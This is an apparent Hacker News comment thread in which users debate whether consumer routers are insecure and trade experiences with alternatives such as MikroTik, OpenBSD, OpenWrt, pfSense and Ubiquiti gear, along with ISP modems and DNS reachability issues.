- second--shift 6y agoThis is good advice for a "one device does it all" setup. My personal setup is actually running the hap AC lites as access points, via CAPsMAN. I do routing on a hex Gr3. The hap ac lites are great value for a dual-radio 2.4/5ghz ap. I also have an all-mikrotik passive poe setup, so it's one lead to the ac lites. Similar featureset to ubnt, cisco, others, at a fraction of the price.
- upofadown 6y agoOpenBSD on a PC Engines APU2 is a good choice for those that would like to enjoy setting up a firewall with PF on low power consuming hardware.
- whalesalad 6y agoI am loving my Edgerouter 4 + Unifi APs. Home network is rock solid. If only I could figure out why my ISP is dropping 20% of packets to Cloudflare DNS.
- blacksmith_tb 6y agoNot sure about your ISP, but CenturyLink for me seems to have something against 1.1.1.1, but not 1.0.0.1 though.
- whalesalad 6y agoI am on WOW. It seems like the connection to Chicago is the problem and that is where most of my traffic goes (I am in Detroit) but requests to MSP are fine. I notice similar issues when loading images via the ORD datacenter.
- selectodude 6y agoCloudflare has been having some weird issues with Chicago lately. I had to outright ditch them recently and switch to OpenDNS because my internet would just stop working due to their DNS failing.
- whalesalad 6y agoHuh, that’s a helpful datapoint. I figured it was just WOW customers because we have been having frequent outages recently. I am on Level3 now since after running some benchmarks it appears to be the fastest for me.
- getsauce 6y agoCenturyLink uses Calix GigaCenter routers which have an embedded http server at 1.1.1.1. Cloudflare calls them out here: https://blog.cloudflare.com/fixing-reachability-to-1-1-1-1-globally/ https://blog.cloudflare.com/fixing-reachability-to-1-1-1-1-g...
- crazygringo 6y agoOK, so this argues that consumer routers are bad. However, no evidence is presented that "business class" routers, as the author calls them, are any better. And the "Consumer Router Alternatives" section [1] of the site is entirely non-helpful. Just 20 random bullets of different brands with unhelpful notes like "I have no experience with them", "I have heard good things", and "build your own router". The first bullet that recommends the "Peplink" router justifies it solely with... Peplink's own product page. Which is the furthest you can get from an unbiased third-party evaluation. Don't the same companies make enterprise routers and consumer routers? Don't they presumably employ the same engineers to write software across them? All of the arguments against consumer routers seems like they could apply against enterprise routers too, unless there's real evidence otherwise. But this post, unfortunately, seems to be quite evidence-free. :( [1] https://routersecurity.org/resources.php https://routersecurity.org/resources.php
- Godel_unicode 6y ago> Don't the same companies make enterprise routers and consumer routers? Kinda but not really (the consumer routers are usually made by subsidiaries, e.g. linksys -> Cisco) > Don't they presumably employ the same engineers to write software across them? For the most part no, but much more importantly the margins are much worse on consumer gear. Race-to-the-bottom pricing means race-to-the-bottom quality and race-to-the-bottom patch cycles (the last one is probably the most important). Add in that there is a deliberate effort to not make low-margin consumer gear not cannibalize high-margin business/enterprise gear. A noted exception to this is NetGate, whose pfSense hardware runs the same OS with the same engineering up and down the stack. Probably not the best idea for a normal consumer to buy, though.
- kevin_thibedeau 6y agoWe now know that NetGate has questionable coding standards. Best to pass on them.
- Godel_unicode 6y agoI'm not sure we know any such thing? They're certainly guilty of insufficient ideological purity with regard to open source, but that's hardly the same thing.
- clairity 6y agothe recommended pepwave surf soho has mult-wan support, including wifi and cellular, which is one of the reasons i went with it (along with robust vlan support). i've yet to find a way to bridge/route everything i want from my main vlan to my iot vlan while isolating everything else appropriately. unfortunately, mine has intermittent radio timeout issues (or something more obscure that i can't diagnose, like frequency-hopping induced congestion), where i have to log into the router and force a rescan of the airwaves for it to reestablish connection to the upstream wan wifi. it's also lately having issues with the 2.4Ghz network dropping out (i may eventually dig up my old wrt54-gl with tomato on it to run the 2.4Ghz separately).
- teddyh 6y agoIt surprises me how many otherwise experienced system administrators consider a home router something you have to buy and get a completly unsuitable plastic throwaway gadget. It’s an internet-connected device, therefore you have to treat like any other server¹. Get a computer, stick a wifi card in it, install your favorite Linux distro, configure the networking (including DNS resolver, DHCP daemon, hostapd, firewall rules, etc.). Keep it updated in whatever way you keep all your other servers updated. Done. Normal consumer routers are bad for the same reason that just about all IoT devices are bad. This will not change unless the incentives involved change; i.e. don’t hold your breath. 1) https://news.ycombinator.com/item?id=18019343 https://news.ycombinator.com/item?id=18019343
- mgarfias 6y agoAvoid consumer laptops too
- Pet_Ant 6y agoI wish there were cable modems available as PCIe expansion cards with OSS drivers so I could roll all my own home networking gear.
- taylodl 6y agoI got an Arris SURFboard SBG7600AC2 a couple of months before the pandemic hit. Don't know about the security but the device itself has been rock-solid. Here I am 14 months later without any complaints. Four people are working remotely on it, numerous mobile devices are connected and some are streaming - it's never broken a sweat. If anyone knows of a security issue I'd love to hear about it.
- infinet 6y agoI have a NanoPi R2S with OpenWrt for almost one year. It's a ARM device so uses very litter power. One of its two gigabits ports is converted from USB3. Works well with 500Mbps downlink. There is a newer mode (R4S) with a PCIe converted gigabits port.
- thefz 6y agoHe's gonna have to pry my Fritz!Box from my cold dead hands.
- mrguyorama 6y agoOkay cool but.... I'm still just plugging these supposedly awesome routers into bargain bin, un-updated, garbage quality, broken, insecure, spying cable modems provided by or "compatible with/verified for" my internet service. So what if my router is secured? My connection is still beholden to whatever garbage software written in 2008 my damn DOCSIS 3.0 compliant box has, with all the unfixed bugs and performance issues that entails. Are there any cable modem/routers that can be customized? Have openWRT or similar installed? Or are otherwise pretty good?
- iudqnolq 6y agoWait until you hear where the bytes go when they leave your house...
- kdmytro 6y agoI have recently bought a Mikrotik RB4011 for my home. It was a bit pricey, but I love the feeling of control I got when I set it up. The model with built-in WiFi had very poor coverage, so I exchanged with it for a model without wifi as that one can he mounted into a rack, and now I will se my old consumer router in bridge mode as an access point.
- sliken 6y agoAnyone consider the Odroid H2+? It's a relatively fast CPU (for a router) the Intel J4115, relatively low power (10 watt TDP), max ram 32GB (plenty for a router), has two 2.5 Gbit ports, with an option to add 4x2.5 Gbit for $47. Also has a eMMC and M.2 slot for reliable storage, to avoid any ugly USB connected storage for boot. Seems like it would make a quiet and fast 6 port x 2.5 Gbit router and run well with Linux based OS, unsure of the state of drivers for *bsd. I did see a thread about getting it to work well with OpenWRT.
- deleted 6y ago[deleted]
- whatupmiked 6y agoEvery critique in this list could be levelled at networking equipment that costs thousands or tens of thousands of dollars.